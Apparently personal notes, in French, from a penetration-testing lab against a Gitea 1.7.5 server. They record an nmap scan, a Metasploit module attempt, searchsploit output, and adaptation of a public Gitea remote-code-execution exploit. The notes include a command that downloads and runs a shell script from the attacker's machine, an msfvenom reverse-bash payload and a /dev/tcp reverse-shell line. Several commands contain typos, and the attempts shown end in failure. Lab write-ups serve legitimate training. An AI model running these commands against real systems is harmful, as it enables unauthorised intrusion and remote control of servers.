 nmap -p- -sV 192.168.62.67

21/tcp   open   ftp     ProFTPD 1.3.5b
22/tcp   open   ssh     OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
53/tcp   closed domain
2222/tcp open   ssh     Dropbear sshd 2016.74 (protocol 2.0)
3000/tcp open   http    Golang net/http server

http://192.168.62.67:3000/
Gitea
http://192.168.62.67:3000/version -> error 404 qui affiche la version
Application Version: 1.7.5

Gitea version 1.7.5

msfconsole 
search gitea
use exploit/multi/http/gitea_git_hooks_rce
set RHOSTS 192.168.62.67 (ip cible)
set RPORT 3000 (port cible)
run
il veut un mot de passe

on va créer un register sur gitea
user : test
pwd : testtest
mail : test@test.com

set USERNAME test
set PASSWORD testtest

set LHOST 192.168.49.55 (ip de la machine attaquante)
run

[*] Repository Rank_Bytecard deleted.
[*] Exploit completed, but no session was created.

test avec searchsploit gitea

------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                          |  Path
------------------------------------------------------------------------ ---------------------------------
Gitea 1.12.5 - Remote Code Execution (Authenticated)                    | multiple/webapps/49571.py
Gitea 1.16.6 - Remote Code Execution (RCE) (Metasploit)                 | multiple/webapps/51009.rb
Gitea 1.22.0 - Stored XSS                                               | multiple/webapps/52077.txt
Gitea 1.24.0 - HTML Injection                                           | multiple/webapps/52087.txt
Gitea 1.4.0 - Remote Code Execution                                     | multiple/webapps/44996.py
Gitea 1.7.5 - Remote Code Execution                                     | multiple/webapps/49383.py


Ma version est 1.7.5 donc  multiple/webapps/49383.py

https://www.exploit-db.com/exploits/49383
le script fait référence à un script shell que l'on va devoir créer, on modifie le script par nos infos :
wget http://192.168.1.1:8080/shell -O /tmp/shell && chmod 777 /tmp/shell && /tmp/shell'

USERNAME = "test" (crée sur gitea)
PASSWORD = "testtest" (crée sur gitea)
HOST_ADDR = '192.168.49.55' (mon ip)
HOST_PORT = 3000
URL = 'http://192.168.55.67:3000'        (la cible)                                                                >
CMD = 'wget http://192.168.49.55:8080/shell.sh -O /tmp/shell.shh && chmod 777 /tmp/shell.sh && /tmp/shell.sh'  

utilisons msfvenom pour créer un playload 

générer avec msfvenom
compiler pour l'OS
héberger le shell sur mon serveur http
la cible execute le wget

msfvenom -p [tab] on trouve un reverse bash
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.49.55 LPORT=4444 -f raw > shell.sh

notre shell.sh est crée

???(root?kali)-[/home/kali]
??# python3 -m http.server 8080

Le shell est mal encodé. on va testé en écrivant
#!/bin.bash
/bin/bash -i >& /dev/tcp/192.168.49.55:4444 0>&1

???(root?kali)-[/home/kali]
??# python3 -m http.server 8080

python3 49383.py  
Le fichier ne se récupère pas
